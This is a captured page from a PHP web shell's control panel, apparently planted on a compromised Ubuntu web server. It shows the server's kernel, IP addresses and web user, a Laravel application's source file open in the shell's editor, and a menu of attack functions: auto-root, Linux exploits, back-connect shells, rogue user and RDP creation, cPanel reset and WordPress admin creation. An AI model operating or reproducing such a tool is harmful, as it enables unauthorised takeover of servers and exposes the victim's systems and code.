Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sifaris /
app /
Events /
[ HOME SHELL ]
Name
Size
Permission
Action
EmailEvent.php
809
B
-rw-rw-r--
GeneralActivityEvent.php
1.21
KB
-rw-rw-r--
RecordEvent.php
1.53
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : RecordEvent.php
<?php namespace App\Events; use App\Models\Record; use Illuminate\Broadcasting\Channel; use Illuminate\Broadcasting\InteractsWithSockets; use Illuminate\Broadcasting\PresenceChannel; use Illuminate\Broadcasting\PrivateChannel; use Illuminate\Contracts\Broadcasting\ShouldBroadcast; use Illuminate\Database\Eloquent\Model; use Illuminate\Foundation\Events\Dispatchable; use Illuminate\Queue\SerializesModels; class RecordEvent { use Dispatchable, InteractsWithSockets, SerializesModels; public Model $log_model; public Model $record; public Model $old_record; public $data; public $activitable_id; public $activitable_type; public $class; public $tag; public $activity_type; /** * Create a new event instance. */ public function __construct(Model $log_model,Model $old_record, Model $record, $data, $activitable_id, $activitable_type, $class, $tag=null, $activity_type = null) { $this->log_model = $log_model; $this->record = $record; $this->old_record = $old_record; $this->data = $data; $this->activitable_id = $activitable_id; $this->activitable_type = $activitable_type; $this->class = $class; $this->tag = $tag; $this->activity_type = $activity_type; } /** * Get the channels the event should broadcast on. * * @return array<int, \Illuminate\Broadcasting\Channel> */ public function broadcastOn(): array { return [ new PrivateChannel('channel-name'), ]; } }
Close